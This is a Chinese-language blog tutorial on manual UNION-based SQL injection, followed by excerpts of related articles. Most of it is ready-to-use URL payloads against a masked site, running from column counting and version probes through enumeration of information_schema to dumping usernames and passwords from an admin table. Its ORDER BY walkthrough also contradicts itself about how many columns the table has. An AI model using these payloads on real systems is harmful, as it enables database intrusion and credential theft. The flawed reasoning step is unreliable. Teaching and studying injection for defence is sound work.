網路安全 sql 注入

2021-10-04 20:50:29 字數 1932 閱讀 8969

未經允許萬不可隨意測試**,請在法律的允許下使用,謹記謹記!

網路安全**:

sql 注入:位址列輸入在資料庫可以執行的語句,並進入資料庫查到資料

例:ww.***.com?id=1 and 1=1 轉 資料庫sql 語句:select * from (表名) where id=1 and 1=1 

ww.***.com?id=123456 and 1=1 union select 1,2

轉 資料庫sql 語句:

select * from  (表名) where id='123456' and 1=1 union select 1,2 (mysql)

select * from  (表名) where id='123456' and 1=1 union select 1,2 from dual;(oracle)

名詞解釋:union 用於合併兩個或多個 select 語句的結果集。

執行結果 :12

123456

user

1.查詢此表裡有幾個字段(假設一共有2個字段)

ww.***.com?id=123456 order by 1 (正常)

ww.***.com?id=123456 order by 2 (正常)

ww.***.com?id=123456 order by 1,2 (正常)

ww.***.com?id=123456 order by 3 (失敗)

結論:此表有3個字段

2.ww.***.com?id=123456 and 1=2 union select 1,database() 

:1=2 錯誤語法 引起資料庫語法出錯 不用查詢前面的 防止union前面select 查詢結果影響後面結果

:select 1,database() 查詢前面select 使用的資料庫

:select 1,user()  查詢當前登入的使用者 

:select 1,version() 資料庫版本號

3.查詢當前mysql有哪些資料庫(預設資料庫 mysql)

ww.***.com?id=1 and 1=2 union select 1,(select group_concat(schema_name) from information_schema.schemata)

mysql 預設有乙個information_schema表

關於此資料庫的詳細解釋 =》

:information_schema:定義資料庫名或表名,列的資料型別,或訪問許可權等。給資料庫定義規範

:schemata:提供了當前mysql例項中所有資料庫的資訊。是show databases的結果取之此表。

:schema_name:儲存所有資料庫的名字

:group_concat :將相同的行組合  即:schema_name相同的行組合在一起

4.查詢指定資料庫裡有哪些表

ww.***.com?id=1 and 1=2 union select group_concat(table_name) from information_schema.tables where table_schema='***'

:tables :提供了關於資料庫中的表的資訊(包括檢視)。詳細表述了某個表屬於哪個schema,表型別,表引擎,建立時間等資訊。

5.查詢當前資料庫指定表裡有哪些字段

ww.***.com?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name= 'admin'

6.查詢指定表裡指定欄位有哪些內容

ww.***.com?id=1 and 1=2 union select 1,group_concat(username,',',password) from admin

網路安全知識之SQL注入

所謂sql注入,就是通過把sql命令插入到web表單提交或輸入網域名稱或頁面請求的查詢字串,最終達到欺騙伺服器執行惡意的sql命令。具體來說,它是利用現有應用程式,將 惡意 的sql命令注入到後台資料庫引擎執行的能力,它可以通過在web表單中輸入 惡意 sql語句得到乙個存在安全漏洞的 上的資料庫,...

網路安全部落格3 sql注入

1.準備 工具 sqlmap 需在python環境中執行 環境 windows python 安裝sqlmap 官網 選擇最近版本安裝即可 安裝sqlmap 官網 選擇最近版本安裝即可 設定環境變數 為了使用便利,將sqlmap的安裝目錄新增到系統環境變數path中 之後在cmd中就可以直接使用sq...

網路安全測試之寫在SQL注入後的語句

本文講述的是寫在sql注入後的語句,旨在服務社會,供安全研究人員學習使用,請勿用於其他非法用途,違者後果自負。1.查詢語句後只能直接呼叫函式,不能直接呼叫儲存過程,例如 select function from dual可以,select procedure from dual不行 2.查詢語句中無...